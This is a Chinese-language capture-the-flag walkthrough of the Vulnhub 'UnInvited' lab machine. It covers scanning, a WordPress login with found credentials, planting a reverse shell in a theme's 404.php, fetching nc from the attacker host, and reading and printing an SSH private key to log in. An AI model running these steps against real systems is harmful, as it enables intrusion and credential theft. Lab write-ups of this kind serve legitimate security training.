Vulnhub之UnInvited靶机测试过程
UnInvited
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:b2:b4:d3 1 60 PCS Systemtechnik GmbH
192.168.56.146 08:00:27:ab:59:15 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.146
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.146 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 22:55 EST
Nmap scan report for localhost (192.168.56.146)
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: SEC-CORP
7894/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 afd242e431ff4ffb0bde18e93fc4bc42 (RSA)
| 256 97564740ea99b2a61aa559567e2bb4a0 (ECDSA)
|_ 256 b2b1674475f6d832a2f2ff7f09a77d53 (ED25519)
60000/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: UNINVITED
MAC Address: 08:00:27:AB:59:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.08 seconds
NMAP扫描结果表明目标主机有3个开放端口:80(http)、7894(ssh)、60000(http)
而且60000端口运行wordpress站点。
获得Shell
Kali Linux利用浏览器访问80端口,从返回页面的源代码中可看到一段注释,将其解码:
</footer>
<!-- Footer section end -->
<!--WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=-->
<!--====== Javascripts & Jquery ======-->
<script src="js/jquery-3.2.1.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/owl.carousel.min.js"></script>
<script src="js/jquery.magnific-popup.min.js"></script>
<script src="js/circle-progress.min.js"></script>
<script src="js/main.js"></script>
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=' | base64 -d
Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts v
要添加主机记录:fieldforce
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.146 fieldforce
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ curl http://192.168.56.146/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.146 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ nikto -h http://192.168.56.146
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.146
+ Target Hostname: 192.168.56.146
+ Target Port: 80
+ Start Time: 2023-03-03 23:03:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 34af, size: 5abb5cae20433, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-03-03 23:04:02 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ gobuster dir -u http://192.168.56.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,sh,php,html
[+] Timeout: 10s
===============================================================
2023/03/03 23:04:55 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/about.html (Status: 200) [Size: 11039]
/contact.html (Status: 200) [Size: 7902]
/blog.html (Status: 200) [Size: 8621]
/img (Status: 301) [Size: 314] [--> http://192.168.56.146/img/]
/index.html (Status: 200) [Size: 13487]
/service.html (Status: 200) [Size: 13090]
/css (Status: 301) [Size: 314] [--> http://192.168.56.146/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.146/js/]
/elements.html (Status: 200) [Size: 13628]
/Source (Status: 301) [Size: 317] [--> http://192.168.56.146/Source/]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1098491 / 1102805 (99.61%)===============================================================
2023/03/03 23:06:58 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ nikto -h http://192.168.56.146:60000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.146
+ Target Hostname: 192.168.56.146
+ Target Port: 60000
+ Start Time: 2023-03-03 23:08:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.146:60000/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'link' found, with contents: <http://fieldforce:60000/wp-json/>; rel="https://api.w.org/"
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (400)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3092: /backdoor/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /server-status: Apache server-status interface found (protected/forbidden)
+ 7923 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-03-03 23:10:42 (GMT-5) (136 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
60000端口扫描出了/backdoor,不过却是wordpress管理后台登录窗口。
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000/backdoor/ -e u,p --wp-content-dir /wp-content
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/backdoor/ [192.168.56.146]
[+] Started: Fri Mar 3 23:13:17 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.8
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.146:60000/backdoor/e442977.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.146:60000/backdoor/e442977.html, Match: 'WordPress 5.4.2'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] No Users Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Mar 3 23:13:19 2023
[+] Requests Done: 51
[+] Cached Requests: 8
[+] Data Sent: 14.547 KB
[+] Data Received: 243.427 KB
[+] Memory used: 224.445 MB
[+] Elapsed time: 00:00:02
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000/backdoor/ -e u,p --wp-content-dir /wp-content --plugins-detection mixed
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/backdoor/ [192.168.56.146]
[+] Started: Fri Mar 3 23:14:00 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.8
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.146:60000/backdoor/1688692.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.146:60000/backdoor/1688692.html, Match: 'WordPress 5.4.2'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:21 <============================================> (1500 / 1500) 100.00% Time: 00:00:21
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.146:60000/wp-content/plugins/akismet/
| Latest Version: 5.0.1
| Last Updated: 2022-11-08T05:36:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.146:60000/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] wps-hide-login
| Location: http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/
| Last Updated: 2022-05-25T13:06:00.000Z
| Readme: http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
| [!] The version is out of date, the latest version is 1.9.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/, status: 403
|
| Version: 1.5.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] No Users Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Mar 3 23:14:24 2023
[+] Requests Done: 1519
[+] Cached Requests: 51
[+] Data Sent: 453.51 KB
[+] Data Received: 521.992 KB
[+] Memory used: 270.008 MB
[+] Elapsed time: 00:00:23
──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/ [192.168.56.146]
[+] Started: Sat Mar 4 00:07:24 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.8
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.146:60000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.146:60000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.146:60000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.146:60000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.146:60000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.146:60000/, Match: 'WordPress 5.4.2'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] elliot
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.56.146:60000/wp-json/wp/v2/users/?per_page=100&page=1
[+] Elliot
| Found By: Rss Generator (Aggressive Detection)
[+] 1
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Mar 4 00:07:35 2023
[+] Requests Done: 46
[+] Cached Requests: 5
[+] Data Sent: 12.027 KB
[+] Data Received: 282.581 KB
[+] Memory used: 145.406 MB
[+] Elapsed time: 00:00:11
这次扫描出用户名elliot
密码是在网页中的内容:wh1ter0se
用cewl工具形成字典,并没有能够得到上述的密码,有点奇怪。
登录成功后,试图通过修改404.php模板,但是返回错误:
使用另一种方法,仍然是到theme editor, 但此在右边选择其他的theme(也就是没有activate的主题),将404.php替换为shell.php的代码,然后update file,就不会报错。
然后访问该主题下的404.php
总结:在本靶机中wordpress的主题为nanospace,通过修改该主题下的404.php模板文件失败,注意无需真的切换主题,而是在右上侧的Select theme to edit:,选择任意一个theme,比如本例中选择Twenty Nineteen主题,然后修改该主题下的404.php文件,即可成功修改,但是此时404.php文件位置一定要对应Twenty Nineteen主题的目录。
fieldforce:60000/wp-content/themes/twentynineteen/404.php
──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.146] 48992
Linux f950b9c50e1d 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 GNU/Linux
06:06:22 up 2:27, 0 users, load average: 3.31, 3.54, 3.46
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@f950b9c50e1d:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@f950b9c50e1d:/$
www-data@f950b9c50e1d:/$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.18.0.3 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:ac:12:00:03 txqueuelen 0 (Ethernet)
RX packets 16616729 bytes 18729729659 (17.4 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17075528 bytes 2087397916 (1.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 2488485 bytes 130686616 (124.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2488485 bytes 130686616 (124.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
www-data@f950b9c50e1d:/$
目前得到的Shell应该在容器里。
www-data@f950b9c50e1d:/home/demodocker/.local$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 demodocker demodocker 4.0K Jul 29 2020 .
drwxr-xr-x 3 demodocker demodocker 4.0K Jul 30 2020 ..
-rw-r--r-- 1 demodocker demodocker 57 Jul 29 2020 note.txt
drwx------ 3 demodocker demodocker 4.0K Jul 28 2020 share
www-data@f950b9c50e1d:/home/demodocker/.local$ cat note.txt
cat note.txt
ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs' | base64 -d
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'LS0taXAtLS0vZnNvY2lldHkuZXhl' | base64 -d
---ip---/fsociety.exe
这表示fsociety.exe文件在192.168.56.146/fsociety.exe,下载到windows
用户名输入: elliot 密码为: mrrobot (在网页中有该单词,但是说实话,这太牵强了)
www-data@f950b9c50e1d:/$ which nc
which nc
www-data@f950b9c50e1d:/$
靶机上没有nc,可以从Kali Linux下载nc
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ cp /usr/bin/nc .
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ ls -alh
total 2.9M
drwxr-xr-x 5 kali kali 4.0K Mar 4 04:05 .
drwxr-xr-x 26 kali kali 4.0K Mar 3 22:52 ..
drwxr-xr-x 6 kali kali 4.0K Jun 5 2017 Magnific-Popup-master
-rw-r--r-- 1 kali kali 339K Mar 3 23:05 Magnific-Popup-master.zip
drwxr-xr-x 7 kali kali 4.0K Mar 4 00:40 nanospace
-rw-r--r-- 1 kali kali 1.7M Mar 4 00:41 nanospace1.zip
-rwxr-xr-x 1 kali kali 35K Mar 4 04:05 nc
-rw-r--r-- 1 root root 1.2K Mar 3 22:55 nmap_full_scan
drwxr-xr-x 7 kali kali 4.0K Apr 20 2018 OwlCarousel2-2.3.4
-rw-r--r-- 1 kali kali 774K Mar 3 23:05 OwlCarousel2-2.3.4.zip
-rwx------ 1 kali kali 5.4K Mar 4 00:21 shell.php
-rw-r--r-- 1 kali kali 2.4K Mar 4 00:26 shell.zip
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
www-data@f950b9c50e1d:/tmp$ wget http://192.168.56.206:8000/nc
wget http://192.168.56.206:8000/nc
--2023-03-04 09:05:46-- http://192.168.56.206:8000/nc
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34952 (34K) [application/octet-stream]
Saving to: ‘nc’
nc 100%[===================>] 34.13K --.-KB/s in 0s
2023-03-04 09:05:46 (853 MB/s) - ‘nc’ saved [34952/34952]
www-data@f950b9c50e1d:/tmp$ ls -alh
ls -alh
total 48K
drwxrwxrwt 1 root root 4.0K Mar 4 09:05 .
drwxr-xr-x 1 root root 4.0K Jul 28 2020 ..
-rw-rw-rw- 1 www-data www-data 35K Mar 4 09:05 nc
drwxr-xr-x 5 root root 4.0K Jul 23 2020 pear
www-data@f950b9c50e1d:/tmp$ chmod 777 nc
chmod 777 nc
根据提示,如果ip为172.18.0.3,则nc监听端口为8888
www-data@f950b9c50e1d:/tmp$ ./nc -nlvp 8888
./nc -nlvp 8888
listening on [any] 8888 ...
www-data@f950b9c50e1d:/tmp$ ./nc -nlvp 8888
./nc -nlvp 8888
listening on [any] 8888 ...
connect to [172.18.0.3] from (UNKNOWN) [172.18.0.1] 54482
id
id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
/home/docksec> ls -alh
ls -alh
total 52K
drwxr-xr-x 7 docksec docksec 4.0K Jul 30 2020 .
drwxr-xr-x 4 root root 4.0K Jul 28 2020 ..
-rw------- 1 docksec docksec 1.1K Jul 30 2020 .bash_history
-rw-r--r-- 1 docksec docksec 220 Jul 28 2020 .bash_logout
-rw-r--r-- 1 docksec docksec 3.7K Jul 28 2020 .bashrc
drwx------ 2 docksec docksec 4.0K Jul 29 2020 .cache
drwx------ 3 docksec docksec 4.0K Jul 29 2020 .gnupg
drwxrwxr-x 3 docksec docksec 4.0K Jul 28 2020 .local
-rw-r--r-- 1 docksec docksec 807 Jul 28 2020 .profile
drwx------ 2 docksec docksec 4.0K Jul 29 2020 .secret
-rw-rw-r-- 1 docksec docksec 66 Jul 29 2020 .selected_editor
drwx------ 2 docksec docksec 4.0K Jul 29 2020 .ssh
-r-------- 1 docksec docksec 318 Jul 28 2020 user1.txt
/home/docksec> cat user1.txt
cat user1.txt
_______ __ __ ___ ___ _______
| | |_| | | | | |
| _____| | | | | ___|
| |_____| | | | | |___
|_____ | | | |___| ___|
_____| | ||_|| | | | |___
|_______|_| |_|___|_______|_______|
FLAG{DASDGFGPXLCKDEG5D7635CSDAFDIMMJDSUWEQDSADIG}
/home/docksec> cd .ssh
cd .ssh
www-data@f950b9c50e1d:/tmp$ ls -alh
ls -alh
total 48K
drwxrwxrwt 1 root root 4.0K Mar 4 09:05 .
drwxr-xr-x 1 root root 4.0K Jul 28 2020 ..
-rwxrwxrwx 1 www-data www-data 35K Mar 4 09:05 nc
drwxr-xr-x 5 root root 4.0K Jul 23 2020 pear
www-data@f950b9c50e1d:/tmp$
/home/docksec> cat ./.ssh/id_rsa
cat ./.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA5poDIBZv6tjox5ZNEDm3zqJ6mk+bteyhJ4mm3Vy1EbP4r1II
5oBP9MkvTXR+fgp0gtxZRuk6qptw29nZc+xONo6J4uLBsPbYyFYTctLjmGnZKDkQ
d8rvsj946u+yGo+YLa7k189YkcAX7Cxzsoe08z7rnjo8g01zW0dPhwDprLdnWIOm
CCF5u/57J9o4qOLVmMiSV/Bmhx+GSSNJzsjFq9yyd6A/Qd/FyT8v8HcHR0xH12oS
UgLO7pZ+/LtTpNDFbbYqhz8vb7LCeSBxAfXQCGpdh1RaELaGysgXYfrZo1yUQoD/
JfMrocQW5UmdfzFuN4jhQJMhHm606loIaEKeIwIDAQABAoIBAQDPGNfftGbUifMc
c/5HqR5LBB6JgR89VgMxB+2E9eJjwLaBdXIq2Gd2VkwWCp4jQe57K7s99O3MFIdZ
2p7w/fMMCh0JV05OSJJN8QfMYlsmIUF2XzFL9EQqV9iXXacdNYKc3GoG6t8HHnYd
k5pgZoH6xrJCStjXrvH/st5YR1iU0/jCbZekuSsCnuZMOhUaEBZpf/eJGcOvcoot
TCUyztHli6JCPS6YWaYqE5K6D1eWrWY45GmRnkv5QjZch6YXzUs2CgCyYtngM9Ed
69Plcj7CfQSxIE0mffyrJnMM3V0cHwCd+uSehGD+ty5H4TpYL3W6Ler3L4u8w4dj
S5Qc0FKpAoGBAP0uLBZq5lCnTw47+oPvGagMaSaFZMRatOIeDfyI3leD3Wux4q56
ms3zZotSRStygce879GNSq+kENI9iOmQ2wT6FzaC4ddGmOTmRDpvN41T8ejShMEp
QRYSLi9cqJnYZGyDzw3VOX0CPe2RrzkT/Xtktpvgbks50DP/LxpFdUQtAoGBAOkr
d49lNKedHx4GWQadFR93Y5REtMSTy4vFw5OTHqboQcXZRJfJmqJVZJOqQ69B16Ul
phKM3Ptckmc1MNiIPiq9Uptsmlu+jDaQ66naEgkvA9gmG32ubVuzAdd6ab2322fx
qABZkEW9AAJQv2JNl5rwRyRhLmMtZO2iwcdXQE2PAoGAbpNO4A+aPZmE9pONizfP
Pc0F07Qo2XVAUQ2NUEE60oAeIZ4Ugd28ZLysiabJ3Prq4aCMITqTZvjB/ACyHkiM
z7SmlME+/7WuqzJClD7kxU3ndqcTIgXxjkEseLUAUgjne1lqAgGhVQ64m1yoacZo
TA8ljhjMMwCyBTOrj87MM5UCgYABSbYtWpfB3UJQviQ7vx5gwB4SsZZ2B4L2UK9V
31gp/9ptJ1gTpo9uGh6mGiipjSmNxfl23MRTtx0v6MFOUOJXBhiwtxbbLuBDZOWI
WKYE2vegeAVq2k3MVd7Ku+hdneheWJ1e8x+y4upfGOcVuev+dRlPgCHrdlK6ZU3A
tiCqzQKBgQD0hAVF+02lZT3yD6wl1m5yiA24Fy2cYNVEVhvqh7E99dODh9ZD+4Kw
I0CofNKqzmFiurY8IFsSKGiLV1siPDx4WrMyCNct/mxJjF0zW3wnBc+th7g/f8Yq
47g7MLormAOzhVOi7kWd4HoIgC3+qzhqS6YVP35c4Pxjcvcv0K1Bbw==
-----END RSA PRIVATE KEY-----
/home/docksec>
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ ssh -i id_rsa docksec@192.168.56.146 -p 7894
The authenticity of host '[192.168.56.146]:7894 ([192.168.56.146]:7894)' can't be established.
ED25519 key fingerprint is SHA256:TDHE9jZRgNWTCsD16WZXDrJFcTVA6M9yWrX7pXR0VyY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.146]:7894' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Mar 4 14:46:34 IST 2023
System load: 0.0
Usage of /: 1.3% of 313.03GB
Memory usage: 35%
Swap usage: 0%
Processes: 128
Users logged in: 0
IP address for enp0s3: 192.168.56.146
IP address for docker0: 172.17.0.1
IP address for br-3a300780bc7a: 172.18.0.1
=> There is 1 zombie process.
287 packages can be updated.
176 updates are security updates.
#########################################################
____ ____ __ ________ .___
__ __ ____/_ | _______ _/_ |/ |\_____ \ __| _/
| | \/ \| |/ \ \/ /| \ __\_(__ < / __ |
| | / | \ | | \ / | || | / \/ /_/ |
|____/|___| /___|___| /\_/ |___||__|/______ /\____ |
\/ \/ \/ \/
